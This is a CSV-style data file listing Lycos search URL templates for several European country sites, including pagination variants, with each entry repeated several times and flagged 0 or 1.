"International","Lycos DE 5 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 5 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 5 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 5 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos ES","http://buscador.lycos.es/cgi-bin/pursuit?family=off&pic_adv=1&pic_family_link=off&query={SEARCH_KEYWORD}&cat=loc","1"
"International","Lycos ES","http://buscador.lycos.es/cgi-bin/pursuit?family=off&pic_adv=1&pic_family_link=off&query={SEARCH_KEYWORD}&cat=loc","0"
"International","Lycos ES","http://buscador.lycos.es/cgi-bin/pursuit?family=off&pic_adv=1&pic_family_link=off&query={SEARCH_KEYWORD}&cat=loc","0"
"International","Lycos ES","http://buscador.lycos.es/cgi-bin/pursuit?family=off&pic_adv=1&pic_family_link=off&query={SEARCH_KEYWORD}&cat=loc","0"
"International","Lycos ES","http://buscador.lycos.es/cgi-bin/pursuit?family=off&pic_adv=1&pic_family_link=off&query={SEARCH_KEYWORD}&cat=loc","0"
"International","Lycos ES","http://buscador.lycos.es/cgi-bin/pursuit?family=off&pic_adv=1&pic_family_link=off&query={SEARCH_KEYWORD}&cat=loc","0"
"International","Lycos ES 2 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","1"
"International","Lycos ES 2 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 2 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 2 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 2 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 2 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 3 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","1"
"International","Lycos ES 3 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 3 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 3 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 3 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 3 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 4 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","1"
"International","Lycos ES 4 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 4 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 4 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 4 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 4 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 5 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","1"
"International","Lycos ES 5 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 5 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 5 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 5 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos ES 5 (Next 10)","http://buscador.lycos.es/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=es&wh=18377&nightsurf=no","0"
"International","Lycos FR","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=fr&tld=com&family=off","1"
"International","Lycos FR","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=fr&tld=com&family=off","0"
"International","Lycos FR","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=fr&tld=com&family=off","0"
"International","Lycos FR","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=fr&tld=com&family=off","0"
"International","Lycos FR","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=fr&tld=com&family=off","0"
"International","Lycos FR","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=fr&tld=com&family=off","0"
"International","Lycos FR 2 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","1"
"International","Lycos FR 2 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 2 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 2 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 2 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 2 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 3 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","1"
"International","Lycos FR 3 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 3 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 3 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 3 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 3 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 4 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","1"
"International","Lycos FR 4 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 4 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 4 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 4 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 4 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 5 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","1"
"International","Lycos FR 5 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 5 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 5 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 5 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos FR 5 (Next 10)","http://vachercher.lycos.fr/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&family=off&SITE=fr&wh=6628777&nightsurf=no","0"
"International","Lycos IT","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=it&matchmode=and&mtemp=main&etemp=error","1"
"International","Lycos IT","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=it&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos IT","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=it&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos IT","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=it&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos IT","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=it&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos IT","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=it&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos IT 2 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","1"
"International","Lycos IT 2 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 2 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 2 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 2 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 2 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 3 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","1"
"International","Lycos IT 3 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 3 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 3 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 3 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 3 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 4 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","1"
"International","Lycos IT 4 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 4 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 4 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 4 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 4 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 5 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","1"
"International","Lycos IT 5 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 5 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 5 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 5 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos IT 5 (Next 10)","http://cerca.lycos.it/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=it&wh=317&nightsurf=no","0"
"International","Lycos NL","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=benelux&matchmode=and&mtemp=main&etemp=error","1"
"International","Lycos NL","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=benelux&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos NL","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=benelux&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos NL","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=benelux&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos NL","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=benelux&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos NL","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=benelux&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos NL 2 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","1"
"International","Lycos NL 2 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 2 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 2 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 2 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 2 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 3 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","1"
"International","Lycos NL 3 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 3 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 3 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 3 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 3 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 4 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","1"
"International","Lycos NL 4 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 4 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 4 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 4 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 4 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 5 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","1"
"International","Lycos NL 5 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 5 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 5 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 5 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos NL 5 (Next 10)","http://zoek.lycos.nl/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=nl&wh=97&nightsurf=no","0"
"International","Lycos SE","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&sc=blue&mtemp=main&etemp=error","1"
"International","Lycos SE","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&sc=blue&mtemp=main&etemp=error","0"
"International","Lycos SE","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&sc=blue&mtemp=main&etemp=error","0"
"International","Lycos SE","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&sc=blue&mtemp=main&etemp=error","0"
"International","Lycos SE","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&sc=blue&mtemp=main&etemp=error","0"
"International","Lycos SE","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&sc=blue&mtemp=main&etemp=error","0"
"International","Lycos Se 2 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","1"
"International","Lycos Se 2 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 2 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 2 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
